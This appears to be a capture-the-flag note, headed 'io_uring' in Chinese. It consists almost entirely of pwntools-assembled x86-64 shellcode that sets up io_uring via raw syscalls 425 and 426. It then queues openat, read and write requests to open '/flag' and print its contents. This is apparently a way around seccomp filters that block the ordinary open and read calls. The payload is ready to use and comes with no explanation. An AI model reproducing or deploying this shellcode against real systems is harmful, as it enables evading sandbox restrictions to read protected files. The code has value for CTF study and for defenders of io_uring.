io_uring

完整shellcode如下，前提是rdx是一个合法的可写地址：

context.arch = ‘amd64’

shellcode = asm(“””

​ mov rbp, rdx

​ add rbp, 0xa00

​ mov rbx, rbp

​ sub rbx, 0xf0

​ “””)

shellcode += asm(shellcraft.syscall(425, 16, “rbx”))

shellcode += asm(“””

​ sub rbx, 0x28

​ mov [rbx], rax

​ mov r13, rax

​ “””)

shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, “r13”, 0))

shellcode += asm(“””

​ mov [rbp-0x110], rax

​ “””)

shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, “r13”, 0x8000000))

shellcode += asm(“””

​ mov [rbp-0x108], rax

​ “””)

shellcode += asm(shellcraft.mmap(0, 1000, 3, 1, “r13”, 0x10000000))

shellcode += asm(“””

​ mov [rbp-0x100], rax

​ xor r13, r13

​ mov [rax], r13

​ mov [rax+8], r13

​ mov [rax+0x10], r13

​ mov [rax+0x18], r13

​ mov [rax+0x20], r13

​ mov [rax+0x28], r13

​ mov [rax+0x30], r13

​ mov [rax+0x38], r13

​ mov rax, [rbp-0x100]

​ mov byte ptr [rax], 0x12

​ mov byte ptr [rax+1], 0x10

​ mov rdx, 0x67616c662f

​ mov [rbp+0x100], rdx

​ mov rdx, rbp

​ add rdx, 0x100

​ mov [rax+0x10], rdx

​ mov eax, [rbp-0xB0]

​ mov edx, eax

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov [rax], r13

​ mov eax, [rbp-0xC4]

​ mov edx, eax

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov edx, [rax]

​ add edx, 1

​ mov [rax], edx

​ mov r12, [rbp-0x118]

​ xor rax, rax

​ sub rsp, 8

​ push 0

​ “””)

shellcode += asm(shellcraft.syscall(426, “r12”, 1, 1, 1, 0, 0))

shellcode += asm(“””

​ add rsp, 0x10

​ mov eax, [rbp-0x8C]

​ mov edx, eax

​ mov rax, [rbp-0x108]

​ add rax, rdx

​ mov [rbp-0xF8], rax

​ mov rax, [rbp-0xF8]

​ mov eax, [rax+8]

​ mov [rbp-0x114], eax

​ lea rdx, [rbp-0x70]

​ mov rax, [rbp-0x100]

​ mov [rax], r13

​ mov [rax+8], r13

​ mov [rax+0x10], r13

​ mov [rax+0x18], r13

​ mov [rax+0x20], r13

​ mov [rax+0x28], r13

​ mov [rax+0x30], r13

​ mov [rax+0x38], r13

​ mov rax, [rbp-0x100]

​ mov byte ptr [rax], 0x16

​ mov ecx, [rbp-0x114]

​ mov [rax+4], ecx

​ mov [rax+0x10], rdx

​ mov rbx, 0x64

​ mov [rax+0x18], rbx

​ mov edx, [rbp-0xB0]

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov [rax], r13

​ mov eax, [rbp-0xC4]

​ mov edx, eax

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov edx, [rax]

​ add edx, 1

​ mov [rax], edx

​ mov r12, [rbp-0x118]

​ xor rax, rax

​ sub rsp, 8

​ push 0

​ “””)

shellcode += asm(shellcraft.syscall(426, “r12”, 1, 1, 1, 0, 0))

shellcode += asm(“””

​ add rsp, 0x10

​ lea rdx, [rbp-0x70]

​ mov rax, [rbp-0x100]

​ mov [rax], r13

​ mov [rax+8], r13

​ mov [rax+0x10], r13

​ mov [rax+0x18], r13

​ mov [rax+0x20], r13

​ mov [rax+0x28], r13

​ mov [rax+0x30], r13

​ mov [rax+0x38], r13

​ mov rax, [rbp-0x100]

​ mov byte ptr [rax], 0x17

​ mov ecx, 1

​ mov [rax+4], ecx

​ mov [rax+0x10], rdx

​ mov rbx, 0x64

​ mov [rax+0x18], rbx

​ mov edx, [rbp-0xB0]

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov [rax], r13

​ mov eax, [rbp-0xC4]

​ mov edx, eax

​ mov rax, [rbp-0x110]

​ add rax, rdx

​ mov edx, [rax]

​ add edx, 1

​ mov [rax], edx

​ mov r12, [rbp-0x118]

​ xor rax, rax

​ sub rsp, 8

​ push 0

​ “””)

shellcode += asm(shellcraft.syscall(426, “r12”, 1, 3, 1, 0, 0))